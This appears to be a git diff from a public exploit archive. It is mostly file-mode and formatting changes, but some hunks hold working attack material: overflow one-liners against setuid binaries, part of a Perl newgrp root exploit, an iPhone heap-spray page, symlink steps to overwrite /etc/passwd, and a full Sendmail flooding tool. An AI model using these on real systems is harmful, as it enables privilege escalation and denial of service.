response team. +26/03/2017: Vendor acknowledged the report. +25/05/2017: Vendor confirmed that development has been completed and it's undergoing security audit. +13/10/2017: Firmwared released to production: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_FIRMWARE_v1.05.07.zip +13/11/2017: DCS-936L Firmware Release Notes: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_RELEASE_NOTES_v1.05.07.pdf +15/11/2017: Published CVE-2017-7851 \ No newline at end of file diff --git a/platforms/hardware/webapps/9975.txt b/platforms/hardware/webapps/9975.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/webapps/9981.txt b/platforms/hardware/webapps/9981.txt old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/dos/20373.txt b/platforms/hp-ux/dos/20373.txt old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/dos/212.c b/platforms/hp-ux/dos/212.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/dos/22552.txt b/platforms/hp-ux/dos/22552.txt old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/dos/22561.txt b/platforms/hp-ux/dos/22561.txt old mode 100755 new mode 100644 index b52c5460d..23bd58a2a --- a/platforms/hp-ux/dos/22561.txt +++ b/platforms/hp-ux/dos/22561.txt @@ -6,4 +6,4 @@ The condition presents itself when excessive data is supplied as part of an argu The precise technical details of this vulnerability are currently unknown. This BID will be updated, as further information is available. -$ /usr/lbin/rwrite something `perl -e 'print "A" x 14628'` something \ No newline at end of file +$ /usr/lbin/rwrite something `perl -e 'print "A" x 14628'` something \ No newline at end of file diff --git a/platforms/hp-ux/dos/23236.txt b/platforms/hp-ux/dos/23236.txt old mode 100755 new mode 100644 index 9abd2a06f..8bf4e2313 --- a/platforms/hp-ux/dos/23236.txt +++ b/platforms/hp-ux/dos/23236.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8795/info It has been reported that dtprintinfo, installed setuid root by default, is susceptible to a locally exploitable buffer overflow vulnerability. The condition is triggered when the value of the DISPLAY environment variable is set to a string exceeding 9777 bytes in length. The vulnerability may allow for local attackers to gain root privileges on the affected host. -export DISPLAY="`perl -e 'printf "A" x 9777'`" \ No newline at end of file +export DISPLAY="`perl -e 'printf "A" x 9777'`" \ No newline at end of file diff --git a/platforms/hp-ux/local/134.c b/platforms/hp-ux/local/134.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/19535.pl b/platforms/hp-ux/local/19535.pl index bf91b29a0..8df23a648 100755 --- a/platforms/hp-ux/local/19535.pl +++ b/platforms/hp-ux/local/19535.pl @@ -1,6 +1,6 @@ -source: http://www.securityfocus.com/bid/683/info - -Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. +#source: http://www.securityfocus.com/bid/683/info +# +#Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. #!/usr/bin/perl @@ -64,4 +64,4 @@ $num=int(($offset-length($code)-length($data)-4)/4); $pre="$nop"x$num; $of=$prealign; $of.=$pre.$code.$data.$postalign.$pcoq; -exec("/bin/newgrp","$of"); \ No newline at end of file +exec("/bin/newgrp","$of"); \ No newline at end of file diff --git a/platforms/hp-ux/local/199.c b/platforms/hp-ux/local/199.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/19990.txt b/platforms/hp-ux/local/19990.txt old mode 100755 new mode 100644 index 349033be1..14d3c8500 --- a/platforms/hp-ux/local/19990.txt +++ b/platforms/hp-ux/local/19990.txt @@ -12,4 +12,4 @@ Details: 4) man opens the tempfiles with O_TRUNC. This means that when a file is symlinked to, that file is blindly truncated. This could lead to easy denial-of-service if you want to trash the password file or a hard disk device file. This could also have bad effects on sane man program operation, regardless of security, if a user runs man and leaves it running, then PIDs are wrapped around and someone of higher privilege runs man and overwrites your tempfiles! -Create ~65535 catXXXX or manXXXX symlinks in /tmp, pointing to the file you want to overwrite (e.g. /etc/passwd). Then wait. When root runs man, the file will be blindly overwritten with the formatted manpage contents (cat????) or unformatted (man????) are written to the symlinked file. \ No newline at end of file +Create ~65535 catXXXX or manXXXX symlinks in /tmp, pointing to the file you want to overwrite (e.g. /etc/passwd). Then wait. When root runs man, the file will be blindly overwritten with the formatted manpage contents (cat????) or unformatted (man????) are written to the symlinked file. \ No newline at end of file diff --git a/platforms/hp-ux/local/20002.txt b/platforms/hp-ux/local/20002.txt old mode 100755 new mode 100644 index d57ee20a6..e3a1dc681 --- a/platforms/hp-ux/local/20002.txt +++ b/platforms/hp-ux/local/20002.txt @@ -4,4 +4,4 @@ A vulnerability exists in the snmpd included with HPUX 11, from Hewlett Packard. Another vulnerability exists which allows users to redirect the logging location of snmpd to an alternate location, using symbolic links. This file is in a mode 777 directory, so any user can remove a file that already exists. Used in conjunction with the ability to alter configuration, this may also help leverage root access. This file is created at boot time, and while /tmp is cleared of its contents, there may be a potential window where a user can create a symbolic link prior to its creation, and directly use this to elevate privileges. -edit /etc/SnmpAgent.d/snmpd.conf. It is world writable. \ No newline at end of file +edit /etc/SnmpAgent.d/snmpd.conf. It is world writable. \ No newline at end of file diff --git a/platforms/hp-ux/local/20162.txt b/platforms/hp-ux/local/20162.txt old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/20386.txt b/platforms/hp-ux/local/20386.txt old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/20724.txt b/platforms/hp-ux/local/20724.txt old mode 100755 new mode 100644 index c0db72256..db662ce8a --- a/platforms/hp-ux/local/20724.txt +++ b/platforms/hp-ux/local/20724.txt @@ -24,4 +24,4 @@ invalid command splex:BdJCfh1D32hzo:11290:::::: Executing: foo:2MQXUgAcnOcEU:11344:::::: invalid command foo:2MQXUgAcnOcEU:11344:::::: qdump> quit -$ \ No newline at end of file +$ \ No newline at end of file diff --git a/platforms/hp-ux/local/21098.c b/platforms/hp-ux/local/21098.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/21577.c b/platforms/hp-ux/local/21577.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/22231.txt b/platforms/hp-ux/local/22231.txt old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/22246.c b/platforms/hp-ux/local/22246.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/23341.c b/platforms/hp-ux/local/23341.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/23342.c b/platforms/hp-ux/local/23342.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/23343.c b/platforms/hp-ux/local/23343.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/245.c b/platforms/hp-ux/local/245.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/2633.c b/platforms/hp-ux/local/2633.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/2634.c b/platforms/hp-ux/local/2634.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/2635.c b/platforms/hp-ux/local/2635.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/2636.c b/platforms/hp-ux/local/2636.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/local/482.c b/platforms/hp-ux/local/482.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/remote/1259.pm b/platforms/hp-ux/remote/1259.pm old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/remote/1261.pm b/platforms/hp-ux/remote/1261.pm old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/remote/22733.c b/platforms/hp-ux/remote/22733.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/remote/977.c b/platforms/hp-ux/remote/977.c old mode 100755 new mode 100644 diff --git a/platforms/hp-ux/shellcode/13295.txt b/platforms/hp-ux/shellcode/13295.txt old mode 100755 new mode 100644 diff --git a/platforms/immunix/local/19875.txt b/platforms/immunix/local/19875.txt old mode 100755 new mode 100644 diff --git a/platforms/immunix/local/20187.c b/platforms/immunix/local/20187.c old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/11890.txt b/platforms/ios/dos/11890.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/11891.txt b/platforms/ios/dos/11891.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/31057.html b/platforms/ios/dos/31057.html old mode 100755 new mode 100644 index 7172cd4c3..20e0b1851 --- a/platforms/ios/dos/31057.html +++ b/platforms/ios/dos/31057.html @@ -6,4 +6,4 @@ Attackers can exploit this issue by enticing an unsuspecting user to view a mali iPhone 1.1.2 and 1.1.3 are affected; other versions may also be vulnerable. -<html><body><script> function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length <= 0x40000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } } </script> <input type='button' onClick='Demo()' value='Go!'> </body></html> \ No newline at end of file +<html><body><script> function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length <= 0x40000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } } </script> <input type='button' onClick='Demo()' value='Go!'> </body></html> \ No newline at end of file diff --git a/platforms/ios/dos/32333.txt b/platforms/ios/dos/32333.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/36903.txt b/platforms/ios/dos/36903.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/37660.txt b/platforms/ios/dos/37660.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/37997.txt b/platforms/ios/dos/37997.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/38337.txt b/platforms/ios/dos/38337.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/39359.txt b/platforms/ios/dos/39359.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/39360.txt b/platforms/ios/dos/39360.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/39361.txt b/platforms/ios/dos/39361.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/39362.txt b/platforms/ios/dos/39362.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/39363.txt b/platforms/ios/dos/39363.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/39364.txt b/platforms/ios/dos/39364.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/40906.txt b/platforms/ios/dos/40906.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/dos/42014.txt b/platforms/ios/dos/42014.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/local/14538.txt b/platforms/ios/local/14538.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/local/35010.c b/platforms/ios/local/35010.txt old mode 100755 new mode 100644 similarity index 93% rename from platforms/ios/local/35010.c rename to platforms/ios/local/35010.txt index 484f82c13..9185390de --- a/platforms/ios/local/35010.c +++ b/platforms/ios/local/35010.txt @@ -1,8 +1,9 @@ -source: http://www.securityfocus.com/bid/45010/info - -Apple iOS is prone to a local privilege-escalation vulnerability. - -Local attackers running malicious code can exploit this issue to elevate their privileges. Successful attacks will completely compromise an affected device. +// source: http://www.securityfocus.com/bid/45010/info +// +// Apple iOS is prone to a local privilege-escalation vulnerability. +// +// Local attackers running malicious code can exploit this issue to elevate their privileges. Successful attacks will completely compromise an affected device. +// int main() { unsigned int target_addr = CONFIG_TARGET_ADDR; diff --git a/platforms/ios/local/42555.txt b/platforms/ios/local/42555.txt old mode 100755 new mode 100644 index 3be5beb59..4da56a62c --- a/platforms/ios/local/42555.txt +++ b/platforms/ios/local/42555.txt @@ -35,4 +35,4 @@ Credit for finding the vulnerabilities, chaining them together, writing the expl Proof of Concept: https://github.com/doadam/ziVA -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42555.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42555.zip \ No newline at end of file diff --git a/platforms/ios/remote/15186.txt b/platforms/ios/remote/15186.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/15664.txt b/platforms/ios/remote/15664.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/16208.txt b/platforms/ios/remote/16208.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/16209.txt b/platforms/ios/remote/16209.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/16228.txt b/platforms/ios/remote/16228.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/16229.txt b/platforms/ios/remote/16229.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/16231.txt b/platforms/ios/remote/16231.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/16271.txt b/platforms/ios/remote/16271.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/16972.txt b/platforms/ios/remote/16972.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/28081.txt b/platforms/ios/remote/28081.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/32738.txt b/platforms/ios/remote/32738.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/34399.txt b/platforms/ios/remote/34399.txt old mode 100755 new mode 100644 index 4c82211ca..0954b9128 --- a/platforms/ios/remote/34399.txt +++ b/platforms/ios/remote/34399.txt @@ -81,27 +81,4 @@ We can look for all the memos by incrementing the value of "id" -#SaMaN(@samanL33T) - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file +#SaMaN(@samanL33T) \ No newline at end of file diff --git a/platforms/ios/remote/38634.txt b/platforms/ios/remote/38634.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/remote/39114.txt b/platforms/ios/remote/39114.txt old mode 100755 new mode 100644 index 7094be2d1..1cea26274 --- a/platforms/ios/remote/39114.txt +++ b/platforms/ios/remote/39114.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow an attacker to bypass certain secur These issues affect Apple iOS versions prior to 7.1. -<iframe src="facetime-audio://user () host com"></iframe> \ No newline at end of file +<iframe src="facetime-audio://user () host com"></iframe> \ No newline at end of file diff --git a/platforms/ios/remote/42784.txt b/platforms/ios/remote/42784.txt old mode 100755 new mode 100644 index 30fb8fdc6..25efe399c --- a/platforms/ios/remote/42784.txt +++ b/platforms/ios/remote/42784.txt @@ -32,4 +32,4 @@ Following the steps above should result in installation of a simple backdoor all Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42784.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42784.zip \ No newline at end of file diff --git a/platforms/ios/remote/42996.txt b/platforms/ios/remote/42996.txt old mode 100755 new mode 100644 index 9eec24431..370aaf3cb --- a/platforms/ios/remote/42996.txt +++ b/platforms/ios/remote/42996.txt @@ -33,4 +33,4 @@ Following the steps above should result in DART's descriptor being mapped into I Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42996.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42996.zip \ No newline at end of file diff --git a/platforms/ios/shellcode/13290.txt b/platforms/ios/shellcode/13290.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/24543.txt b/platforms/ios/webapps/24543.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/24603.txt b/platforms/ios/webapps/24603.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/25412.txt b/platforms/ios/webapps/25412.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/25414.txt b/platforms/ios/webapps/25414.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/25415.txt b/platforms/ios/webapps/25415.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/25417.txt b/platforms/ios/webapps/25417.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/26888.txt b/platforms/ios/webapps/26888.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/26890.txt b/platforms/ios/webapps/26890.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/26952.txt b/platforms/ios/webapps/26952.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/26953.txt b/platforms/ios/webapps/26953.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/26954.txt b/platforms/ios/webapps/26954.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/27042.txt b/platforms/ios/webapps/27042.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/27188.txt b/platforms/ios/webapps/27188.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/27189.txt b/platforms/ios/webapps/27189.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/27376.txt b/platforms/ios/webapps/27376.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/27655.txt b/platforms/ios/webapps/27655.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/27656.txt b/platforms/ios/webapps/27656.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/28236.txt b/platforms/ios/webapps/28236.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/28975.txt b/platforms/ios/webapps/28975.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/28976.txt b/platforms/ios/webapps/28976.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/28977.txt b/platforms/ios/webapps/28977.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/28978.txt b/platforms/ios/webapps/28978.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/29633.txt b/platforms/ios/webapps/29633.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/30000.txt b/platforms/ios/webapps/30000.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/30031.txt b/platforms/ios/webapps/30031.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/30055.txt b/platforms/ios/webapps/30055.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/30145.txt b/platforms/ios/webapps/30145.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/30146.txt b/platforms/ios/webapps/30146.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/30215.txt b/platforms/ios/webapps/30215.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/30311.txt b/platforms/ios/webapps/30311.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/30375.txt b/platforms/ios/webapps/30375.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/30476.txt b/platforms/ios/webapps/30476.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31258.txt b/platforms/ios/webapps/31258.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31573.txt b/platforms/ios/webapps/31573.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31618.txt b/platforms/ios/webapps/31618.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31691.txt b/platforms/ios/webapps/31691.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31692.txt b/platforms/ios/webapps/31692.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31693.txt b/platforms/ios/webapps/31693.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31733.txt b/platforms/ios/webapps/31733.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31896.txt b/platforms/ios/webapps/31896.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31900.txt b/platforms/ios/webapps/31900.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/31962.txt b/platforms/ios/webapps/31962.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32374.txt b/platforms/ios/webapps/32374.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32557.txt b/platforms/ios/webapps/32557.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32558.txt b/platforms/ios/webapps/32558.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32559.txt b/platforms/ios/webapps/32559.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32560.txt b/platforms/ios/webapps/32560.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32569.txt b/platforms/ios/webapps/32569.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32619.txt b/platforms/ios/webapps/32619.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32620.txt b/platforms/ios/webapps/32620.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32664.txt b/platforms/ios/webapps/32664.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32703.txt b/platforms/ios/webapps/32703.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/32866.txt b/platforms/ios/webapps/32866.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/33026.txt b/platforms/ios/webapps/33026.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/33627.txt b/platforms/ios/webapps/33627.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/33628.txt b/platforms/ios/webapps/33628.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/33629.txt b/platforms/ios/webapps/33629.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/33630.txt b/platforms/ios/webapps/33630.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/33631.txt b/platforms/ios/webapps/33631.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/33632.txt b/platforms/ios/webapps/33632.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/33996.txt b/platforms/ios/webapps/33996.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34196.txt b/platforms/ios/webapps/34196.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34240.txt b/platforms/ios/webapps/34240.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34243.txt b/platforms/ios/webapps/34243.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34263.txt b/platforms/ios/webapps/34263.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34264.txt b/platforms/ios/webapps/34264.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34303.txt b/platforms/ios/webapps/34303.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34305.txt b/platforms/ios/webapps/34305.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34626.txt b/platforms/ios/webapps/34626.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34627.txt b/platforms/ios/webapps/34627.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34664.txt b/platforms/ios/webapps/34664.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34682.txt b/platforms/ios/webapps/34682.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34816.txt b/platforms/ios/webapps/34816.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34957.txt b/platforms/ios/webapps/34957.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/34981.txt b/platforms/ios/webapps/34981.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/35037.txt b/platforms/ios/webapps/35037.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/35038.txt b/platforms/ios/webapps/35038.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/35082.txt b/platforms/ios/webapps/35082.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/35083.txt b/platforms/ios/webapps/35083.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/35775.txt b/platforms/ios/webapps/35775.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/36795.txt b/platforms/ios/webapps/36795.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/36796.txt b/platforms/ios/webapps/36796.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/36797.txt b/platforms/ios/webapps/36797.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/36798.txt b/platforms/ios/webapps/36798.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/36904.txt b/platforms/ios/webapps/36904.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/36922.txt b/platforms/ios/webapps/36922.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/36924.txt b/platforms/ios/webapps/36924.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/36943.txt b/platforms/ios/webapps/36943.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/37057.txt b/platforms/ios/webapps/37057.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/37213.txt b/platforms/ios/webapps/37213.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/37492.txt b/platforms/ios/webapps/37492.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/37761.txt b/platforms/ios/webapps/37761.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/38258.txt b/platforms/ios/webapps/38258.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/38342.txt b/platforms/ios/webapps/38342.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/38343.txt b/platforms/ios/webapps/38343.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/39335.txt b/platforms/ios/webapps/39335.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/39479.txt b/platforms/ios/webapps/39479.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/39721.txt b/platforms/ios/webapps/39721.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/41401.txt b/platforms/ios/webapps/41401.txt old mode 100755 new mode 100644 diff --git a/platforms/ios/webapps/41432.txt b/platforms/ios/webapps/41432.txt old mode 100755 new mode 100644 diff --git a/platforms/irix/dos/21431.txt b/platforms/irix/dos/21431.txt old mode 100755 new mode 100644 diff --git a/platforms/irix/dos/22638.txt b/platforms/irix/dos/22638.txt old mode 100755 new mode 100644 index c2c1d6ac2..7179b0389 --- a/platforms/irix/dos/22638.txt +++ b/platforms/irix/dos/22638.txt @@ -5,4 +5,4 @@ A buffer overflow vulnerability has been reported for the MediaMail binary that Although unconfirmed, an attacker, using a custom crafted string, could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code with group 'mail' privileges. sh$ export $HOME=`perl -e 'print "A"x12096' -sh$ /usr/bin/X11/MediaMail \ No newline at end of file +sh$ /usr/bin/X11/MediaMail \ No newline at end of file diff --git a/platforms/irix/dos/23167.c b/platforms/irix/dos/23167.c old mode 100755 new mode 100644 index 9b56f904c..77ff6bf92 --- a/platforms/irix/dos/23167.c +++ b/platforms/irix/dos/23167.c @@ -1,98 +1,91 @@ -source: http://www.securityfocus.com/bid/8674/info + against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2) + (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl> -Sendmail has been reported prone to a denial of service vulnerability when handling malicious SMTP mail headers. The vulnerability has been reported to present itself, due to an inefficient implementation of a header prescan algorithm. + Usage: ./against existing_user_on_victim_host victim_host + Example: ./against nobody lamers.net -A remote attacker may reportedly deny service to legitimate users by sending specially crafted emails to the affected service. +*/ -/* - against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2) - (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl> - - Usage: ./against existing_user_on_victim_host victim_host - Example: ./against nobody lamers.net - - */ - - #include <stdio.h> - #include <unistd.h> - #include <sys/param.h> - #include <sys/socket.h> - #include <sys/time.h> - #include <netinet/in.h> - #include <netdb.h> - #include <stdarg.h> - #include <errno.h> - #include <signal.h> - #include <getopt.h> - #include <stdlib.h> - #include <string.h> - - #define MAXCONN 4 - #define LINES 15000 - - struct hostent *hp; - struct sockaddr_in s; - int suck,loop,x; - - int main(int argc,char* argv[]) { - - printf("against.c - another Sendmail DoS (up to 8.9.2)\n"); - - if (argc-3) { - printf("Usage: %s victim_user victim_host\n",argv[0]); - exit(0); - } - - hp=gethostbyname(argv[2]); - - if (!hp) { - perror("gethostbyname"); - exit(1); - } - - fprintf(stderr,"Doing mess: "); - - for (;loop<MAXCONN;loop++) if (!(x=fork())) { - FILE* d; - bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length); - s.sin_family=hp->h_addrtype; - s.sin_port=htons(25); - if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket"); - if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect"); - if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); } - - usleep(100000); - - fprintf(d,"helo tweety\n"); - fprintf(d,"mail from: tweety@polbox.com\n"); - fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]); - fprintf(d,"data\n"); - - usleep(100000); - - for(loop=0;loop<LINES;loop++) { - if (!(loop%100)) fprintf(stderr,"."); - fprintf(d,"To: x\n"); - } - - fprintf(d,"\n\n\nsomedata\n\n\n"); - - fprintf(d,".\n"); - - sleep(1); - - fprintf(d,"quit\n"); - fflush(d); - - sleep(100); - shutdown(suck,2); - close(suck); - exit(0); - } - - waitpid(x,&loop,0); - - fprintf(stderr,"ok\n"); - - return 0; - } \ No newline at end of file +#include <stdio.h> +#include <unistd.h> +#include <sys/param.h> +#include 